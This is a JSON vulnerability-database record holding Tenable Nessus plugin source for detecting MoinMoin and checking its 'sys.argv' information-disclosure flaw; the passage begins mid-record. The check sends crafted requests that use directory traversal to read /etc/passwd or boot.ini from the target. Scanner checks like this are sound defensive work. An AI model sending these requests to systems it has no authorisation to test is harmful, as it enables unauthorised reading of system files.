attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "title": "MoinMoin 'sys.argv' Information Disclosure", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 3, "lastseen": "2018-06-14T11:46:45"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "2e3f98c5297011c43dcdc2909cdb11f9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "fbaa7aaef004543abfb03afc18f36e29"}, {"key": "href", "hash": "fe9a8063247dc1202e5c7b299bafaae5"}, {"key": "modified", "hash": "5299677d29a0b2004584ce465e834b3e"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "c92c413cead7d8b67a89850ba352e1d1"}, {"key": "published", "hash": "e6bbd208158726fd2466851d40749c01"}, {"key": "references", "hash": "3d3ded498434ba95a95554d0c03d27f9"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "1322ffe6a3b5b7adcb0ce273f3e1c8bc"}, {"key": "title", "hash": "3bc8ae7fd7de8e514651987da94469a3"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "4573c5d521b0bf955401ef45fde1d9bdf9689ac222db5bab221885f09b5f9d79", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["MOINMOIN_DETECT.NASL"]}], "modified": "2019-02-21T01:13:01"}, "score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44383);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_bugtraq_id(37853);\n script_xref(name:\"Secunia\", value:\"38242\");\n\n script_name(english:\"MoinMoin 'sys.argv' Information Disclosure\");\n script_summary(english:\"Tries to retrieve a local file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A wiki application on the remote web server has an information\ndisclosure vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of MoinMoin running on the remote host has an information\ndisclosure vulnerability. Using a specially crafted request, an\nunauthenticated, remote attacker can specify the directory that the\napplication uses for its static pages and read arbitrary files from\nthat directory, subject to the privileges under which the application\nruns.\n\nNote that successful exploitation requires MoinMoin's 'FCGI_FORCE_CGI'\nsetting to be enabled.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://moinmo.in/MoinMoinChat/Logs/moin-dev/2010-01-18\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/rev/9d8e7ce3c3a2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://moinmo.in/SecurityFixes\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to MoinMoin 1.9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"moinmoin_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/moinmoin\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'moinmoin', port:port);\nif (isnull(install))\n exit(1, \"No MoinMoin installs on port \"+port+\" were found in the KB.\");\n\nurl = install['dir']+'/';\nres = http_send_recv3(method:\"GET\", item:url, port:port);\nif (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n# First figure out the name of the static page directory\npattern = '<script type=\"text/javascript\" src=\"(/[^/]+)/common/js/common.js\">';\nmatch = eregmatch(string:res[2], pattern:pattern);\nif (match)\n static_dir = match[1];\nelse\n exit(1, \"Unable to extract static page dir from \"+build_url(qs:url, port:port)+\".\");\n\nos = get_kb_item(\"Host/OS\");\nif (!os || 'Windows' >< os)\n{\n # we'll do a dir traversal instead of providing an absolute path, which would\n # require specifying a drive letter\n dir['win'] = '../../../../../../../../../../../../../../../';\n file['win'] = 'boot.ini';\n pat['win'] = '\\\\[boot loader\\\\]';\n}\nif (!os || 'Windows' >!< os)\n{\n dir['unix'] = '/etc';\n file['unix'] = 'passwd';\n pat['unix'] = 'root:.*:0:[01]:';\n}\n\n# Then try to get a file outside the web root\nforeach os (keys(dir))\n{\n url = install['dir']+static_dir+'/'+file[os]+'?--htdocs+'+dir[os];\n res = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if (!isnull(res[2]) && egrep(pattern:pat[os], string:res[2]))\n {\n if (report_verbosity > 0)\n {\n trailer = NULL;\n\n if (report_verbosity > 1)\n {\n trailer =\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n'+\n res[2]+'\\n'+\n crap(data:\"-\", length:30)+\" snip \"+crap(data:\"-\", length:30)+'\\n';\n }\n\n report = get_vuln_report(items:url, port:port, trailer:trailer);\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n\n exit(0);\n }\n}\n\nfull_url = build_url(qs:install['dir'] + '/', port:port);\nexit(0, 'The MoinMoin install at '+full_url+' is not affected.');\n", "naslFamily": "CGI abuses", "pluginID": "44383", "cpe": ["cpe:/a:moinmo:moinmoin"], "scheme": null}
{"nessus": [{"lastseen": "2017-10-29T13:42:27", "bulletinFamily": "scanner", "description": "The remote host is running MoinMoin, a wiki written in Python.", "modified": "2013-01-21T00:00:00", "published": "2010-02-02T00:00:00", "id": "MOINMOIN_DETECT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44382", "type": "nessus", "title": "MoinMoin Detection", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44382);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/01/21 17:45:00 $\");\n\n script_name(english:\"MoinMoin Detection\");\n script_summary(english:\"Looks for evidence of MoinMoin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote web server is hosting a wiki written in Python.\");\n script_set_attribute(attribute:\"description\", value:\"The remote host is running MoinMoin, a wiki written in Python.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.moinmo.in/\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2010/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:moinmo:moinmoin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\n\ndirs = cgi_dirs();\nif (thorough_tests)\n{\n dirs = make_list(dirs, '/wiki', '/moin.cgi', '/moinmoin');\n dirs = list_uniq(dirs);\n}\n\nchecks = make_array();\n\nregexes = make_list();\nregexes[0] = make_list(\"MoinMoin(<\\/a>)? Version<\");\nregexes[1] = make_list(\"<dd>Release (.+) \\[Revision\");\nchecks[\"/SystemInfo\"] = regexes;\n\ninstalls = find_install(\n appname : \"moinmoin\",\n checks : checks,\n dirs : dirs,\n port : port\n);\nif (isnull(installs)) audit(AUDIT_WEB_APP_NOT_INST, \"MoinMoin\", port);\n\nreport = NULL;\nif (report_verbosity > 0)\n{\n report = get_install_report(\n display_name : \"MoinMoin\",\n installs : installs,\n port : port\n );\n security_note(port:port, extra:report);\n}\nelse security_note(port);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}
